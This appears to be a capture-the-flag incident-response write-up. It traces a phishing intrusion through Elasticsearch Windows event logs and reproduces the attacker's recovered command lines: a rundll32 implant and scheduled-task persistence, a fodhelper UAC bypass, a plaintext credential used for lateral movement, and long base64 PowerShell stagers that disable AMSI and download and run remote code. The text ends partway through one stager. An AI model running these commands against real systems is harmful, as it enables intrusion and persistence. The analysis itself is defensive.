Boogeyman 3

The Boogeyman emerges from the darkness again.

CONTEXT

I. Background

Without tripping any security defences of Quick Logistics LLC, the Boogeyman was able to compromise one of the employees and stayed in the dark, waiting for the right moment to continue the attack. Using this initial email access, the threat actors attempted to expand the impact by targeting the CEO, Evan Hutchinson.

1. Incident

The email appeared questionable, but Evan still opened the attachment despite the scepticism. After opening the attached document and seeing that nothing happened, Evan reported the phishing email to the security team.

2. Initial Investigation

Upon receiving the phishing email report, the security team investigated the workstation of the CEO. During this activity, the team discovered the email attachment in the downloads folder of the victim.

In addition, the security team also observed a file inside the ISO payload, as shown in the image below.

Lastly, it was presumed by the security team that the incident occurred between August 29 and August 30, 2023.

II. Artifacts

1. THM AttackBox

There are multiple services running for this room:

$ nmap --min-rate 1000 -p- -v 10.10.138.205

  PORT     STATE SERVICE
  22/tcp   open  ssh
  80/tcp   open  http
  9200/tcp open  wap-wsp
  9300/tcp open  vrace

Mainly for a hosted ELK Stack application:

Meaning TCP Port 9200 should be for the Elastic API.

2. Elastic API

There seems to be Windows Event Logs ingested into the platform:

$ curl http://elastic:elastic@10.10.241.17:9200/_cat/indices?v

  health status index                               uuid                   pri rep docs.count docs.deleted store.size pri.store.size
  green  open   .geoip_databases                    lM0DBBCZRzeTnKl49aAmJA   1   0          3            0      2.6mb          2.6mb
  green  open   .security-7                         Fp59LRkXSwm1jHrq8gpibg   1   0         60            0      258kb          258kb
  green  open   .apm-custom-link                    Ek1KihMXRwOoAIGOBcIU-w   1   0          0            0       226b           226b
  green  open   .kibana_task_manager_7.17.6_001     WSbAubYpTRmGec9_aFSUHg   1   0         18         3447      1.4mb          1.4mb
  green  open   .apm-agent-configuration            ffMaJ0oFQZKgTziSPYgewg   1   0          0            0       226b           226b
  green  open   .async-search                       2-WPoD_4QpOoKpd0SBYM2g   1   0          0            0       252b           252b
  green  open   .kibana_7.17.6_001                  lXdTCB9mRHm56zAO4YZ50A   1   0         42            0      4.8mb          4.8mb
  yellow open   winlogbeat-7.17.6-2023.11.02-000002 CDv3Ai6xSvu2HhxvzaUcjA   1   1          0            0       226b           226b
  yellow open   winlogbeat-7.17.6-2023.08.29-000001 9g4EM-4oRImckEii7zspjg   1   1      29093            0     47.6mb         47.6mb
  green  open   .tasks                              7kEiTgXrTwmguQ3TbIgUHA   1   0         12            0     57.7kb         57.7kb

Using the following JSON query to see what the analyst will be dealing with:

{
	"query":{
		"bool": {
			"must": {
				"wildcard": {
					"user.name": "*"
				}
			},
			"should": [{
				"match": {
					"event.category": "process"
				}
			}],
			"filter": {
				"range": {
					"@timestamp": {
        					"gte": "2023-08-29T00:00:00", 
        					"lte": "2023-08-31T00:00:00"
					}
				}
			}
		}
	},
	"_source": ["user.name", "host.hostname"]
}

For the first 10000 logs based on process creations within the specified timeframe, a bulk of it was generated by evan.hutchinson and allan.smith:

$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=10000 | jq -r '.hits.hits[]."_source".user.name' | sort | uniq -c | sort -nr

   5337 evan.hutchinson
   1837 allan.smith
   1767 Administrator
    427 DC01$
    385 SYSTEM
    104 WKSTN-0051$
     42 itadmin
     22 WKSTN-1327$
     22 LOCAL SERVICE
     21 NETWORK SERVICE
   [..omitted..]

Now, looking at the number of endpoints with process creation logs, more than half was generated on WKSTN-0051 and will now be assumed to be the workstation of evan.hutchinson:

$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=10000 | jq -r '.hits.hits[]."_source".host.hostname' | sort | uniq -c | sort -nr

   5695 WKSTN-0051
   2174 DC01
   2131 WKSTN-1327

ANALYSIS

For this section, the following JSON query will be utilized but the value of user.name will be changed depending on the user being investigated:

{
	"query":{
		"bool": {
			"must": {
				"term": {
					"user.name": "<USERNAME OF INTEREST>"
				}
			},
			"should": [{
				"match": {
					"event.category": "process"
				}
			}],
			"filter": {
				"range": {
					"@timestamp": {
        					"gte": "2023-08-29T00:00:00", 
        					"lte": "2023-08-31T00:00:00"
					}
				}
			}
		}
	},
	"_source": ["@timestamp", "host.hostname", "user.name", "user.domain", "process.name", "process.command_line", "process.pid", "process.parent.name", "process.parent.executable", "process.parent.pid"]
}

I. WKSTN-0051

Upon execution of the HTA file (PID 6392), three new processes were spawned:

$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp")  \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 6392              

  2023-08-29T23:51:15.856Z  evan.hutchinson	6392	2940	"C:\Windows\SysWOW64\mshta.exe" "D:\ProjectFinancialSummary_Q3.pdf.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} 
  2023-08-29T23:51:16.738Z  evan.hutchinson	3832	6392	"C:\Windows\System32\xcopy.exe" /s /i /e /h D:\review.dat C:\Users\EVAN~1.HUT\AppData\Local\Temp\review.dat
  2023-08-29T23:51:16.771Z  evan.hutchinson	3680	6392	"C:\Windows\System32\rundll32.exe" D:\review.dat,DllRegisterServer
  2023-08-29T23:51:16.809Z  evan.hutchinson	6204	6392	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A = New-ScheduledTaskAction -Execute 'rundll32.exe' -Argument 'C:\Users\EVAN~1.HUT\AppData\Local\Temp\review.dat,DllRegisterServer'; $T = New-ScheduledTaskTrigger -Daily -At 06:00; $S = New-ScheduledTaskSettingsSet; $P = New-ScheduledTaskPrincipal $env:username; $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S; Register-ScheduledTask Review -InputObject $D -Force;

It copies an implant somewhere in the filesystem and executes a function, DllRegisterServer, from review.dat via rundll32.exe. It eventually creates a scheduled task (named Review) presumably for persistence:

$A = New-ScheduledTaskAction -Execute 'rundll32.exe' -Argument 'C:\Users\EVAN~1.HUT\AppData\Local\Temp\review.dat,DllRegisterServer'; 
$T = New-ScheduledTaskTrigger -Daily -At 06:00; 
$S = New-ScheduledTaskSettingsSet; 
$P = New-ScheduledTaskPrincipal $env:username; 
$D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S; 
Register-ScheduledTask Review -InputObject $D -Force;

Tracing the executions of review.dat to figure out what it does, the related PIDs were searched:

$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp")  \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 3680 

  2023-08-29T23:51:16.771Z  evan.hutchinson	3680	6392	"C:\Windows\System32\rundll32.exe" D:\review.dat,DllRegisterServer
  2023-08-29T23:51:17.116Z  evan.hutchinson	4672	3680	"C:\Windows\System32\rundll32.exe" D:\review.dat,DllRegisterServer
  
$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp")  \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 4672

  2023-08-29T23:51:17.116Z  evan.hutchinson	4672	3680	"C:\Windows\System32\rundll32.exe" D:\review.dat,DllRegisterServer
  2023-08-29T23:53:47.951Z  evan.hutchinson	6660	4672	"C:\Windows\system32\cmd.exe" /c "whoami /all"
  2023-08-29T23:54:12.765Z  evan.hutchinson	5496	4672	"C:\Windows\system32\net.exe" users
  2023-08-29T23:54:16.129Z  evan.hutchinson	6932	4672	"C:\Windows\system32\net.exe" localgroup administrators
  2023-08-29T23:54:48.565Z  evan.hutchinson	4504	4672	"C:\Windows\system32\whoami.exe" /groups
  2023-08-29T23:54:48.608Z  evan.hutchinson	4468	4672	"C:\Windows\system32\whoami.exe" /groups
  2023-08-29T23:54:49.043Z  evan.hutchinson	5308	4672	"C:\Windows\system32\fodhelper.exe" 
  2023-08-29T23:54:49.213Z  evan.hutchinson	5180	4672	"C:\Windows\system32\fodhelper.exe" 
  2023-08-30T01:40:37.178Z  evan.hutchinson	2260	4672	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$credential = (New-Object PSCredential -ArgumentList ('QUICKLOGISTICS\allan.smith', (ConvertTo-SecureString 'Tr!ckyP@ssw0rd987' -AsPlainText -Force))) ; Invoke-Command -Credential $credential -ComputerName WKSTN-1327 -ScriptBlock {powershell -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBqAEEARwBRAEEAYgBnAEEAdQBBAEcASQBBAFkAUQBCAHUAQQBHAEUAQQBiAGcAQgBoAEEASABBAEEAWgBRAEIAbABBAEcAdwBBAGMAQQBCAGgAQQBIAEkAQQBkAEEAQgA1AEEAQwA0AEEAYgBnAEIAbABBAEgAUQBBAE8AZwBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAGEAZABtAGkAbgAvAGcAZQB0AC4AcABoAHAAJwA7ACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBjAC4AUAByAG8AeAB5AD0AWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBEAGUAZgBhAHUAbAB0AFcAZQBiAFAAcgBvAHgAeQA7ACQAdwBjAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQATgBlAHQAdwBvAHIAawBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAOwAkAFMAYwByAGkAcAB0ADoAUAByAG8AeAB5ACAAPQAgACQAdwBjAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAQgB5AHQAZQBzACgAJwB9AHcAUwAxACYAVgBOAHEAbwBJAFkAKgBHACMANQAtAFAAbAB2AHsAcAAyAGYAPQA0AFoAPwB1AGEAdABAADwAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAcgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAG8AdQBuAHQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgB4AG8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAHIAbABrAEgAVgBYAFcAYgBiAD0AMQAzAGMAZgBjAG8AOQByAFUAWAB4ADAAaQA0AEoAMwB4AFQAdQA2ADgAMgBKAEYAaQBYADAAPQAiACkAOwAkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABzAGUAcgArACQAdAApADsAJABpAHYAPQAkAGQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEAPQAkAGQAYQB0AGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUAbgBnAHQAaABdADsALQBqAG8AaQBuAFsAQwBoAGEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==}"

The attacker seems to have been able to gain local administrator privileges on WKSTN-0051 as the user evan.hutchinson based on the sequence of user enumeration commands and eventually running fodhelper.exe which could be utilized for UAC Bypass primarily for Windows 10.

It is also important to note that the last execution discovered above was for a lateral movement attempt to WKSTN-1327 as allan.smith. For now, looking into executions spawned from fodhelper.exe:

$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp")  \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 5180

  2023-08-29T23:54:49.213Z  evan.hutchinson	5180	4672	"C:\Windows\system32\fodhelper.exe" 
  2023-08-29T23:54:49.444Z  evan.hutchinson	7116	5180	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x

It's taking a base64 encoded string from the registry and runs it via PowerShell. What that command is could be retrieved from the logs by following the execution:

$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp")  \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 7116

  2023-08-29T23:54:49.444Z  evan.hutchinson	7116	5180	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x
  2023-08-29T23:54:50.125Z  evan.hutchinson	6160	7116	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBqAEEARwBRAEEAYgBnAEEAdQBBAEcASQBBAFkAUQBCAHUAQQBHAEUAQQBiAGcAQgBoAEEASABBAEEAWgBRAEIAbABBAEcAdwBBAGMAQQBCAGgAQQBIAEkAQQBkAEEAQgA1AEEAQwA0AEEAYgBnAEIAbABBAEgAUQBBAE8AZwBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAB3AGMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAnAH0AdwBTADEAJgBWAE4AcQBvAEkAWQAqAEcAIwA1AC0AUABsAHYAewBwADIAZgA9ADQAWgA/AHUAYQB0AEAAPAAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQByAGcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwB1AG4AdABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBiAHgAbwByACQAUwBbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYAXQB9AH0AOwAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAQwBvAG8AawBpAGUAIgAsACIAcgBsAGsASABWAFgAVwBiAGIAPQBUAHAAbQBVAEQAaQBiAFgAcABmAGkAVQBVADEALwBtAHcAcQB3AG0AZQBuAHQAZwBiADMASQA9ACIAKQA7ACQAZABhAHQAYQA9ACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHMAZQByACsAJAB0ACkAOwAkAGkAdgA9ACQAZABhAHQAYQBbADAALgAuADMAXQA7ACQAZABhAHQAYQA9ACQAZABhAHQAYQBbADQALgAuACQAZABhAHQAYQAuAGwAZQBuAGcAdABoAF0AOwAtAGoAbwBpAG4AWwBDAGgAYQByAFsAXQBdACgAJgAgACQAUgAgACQAZABhAHQAYQAgACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA
  
$ echo "SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBqAEEARwBRAEEAYgBnAEEAdQBBAEcASQBBAFkAUQBCAHUAQQBHAEUAQQBiAGcAQgBoAEEASABBAEEAWgBRAEIAbABBAEcAdwBBAGMAQQBCAGgAQQBIAEkAQQBkAEEAQgA1AEEAQwA0AEEAYgBnAEIAbABBAEgAUQBBAE8AZwBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAB3AGMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAnAH0AdwBTADEAJgBWAE4AcQBvAEkAWQAqAEcAIwA1AC0AUABsAHYAewBwADIAZgA9ADQAWgA/AHUAYQB0AEAAPAAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQByAGcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwB1AG4AdABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBiAHgAbwByACQAUwBbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYAXQB9AH0AOwAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAQwBvAG8AawBpAGUAIgAsACIAcgBsAGsASABWAFgAVwBiAGIAPQBUAHAAbQBVAEQAaQBiAFgAcABmAGkAVQBVADEALwBtAHcAcQB3AG0AZQBuAHQAZwBiADMASQA9ACIAKQA7ACQAZABhAHQAYQA9ACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHMAZQByACsAJAB0ACkAOwAkAGkAdgA9ACQAZABhAHQAYQBbADAALgAuADMAXQA7ACQAZABhAHQAYQA9AC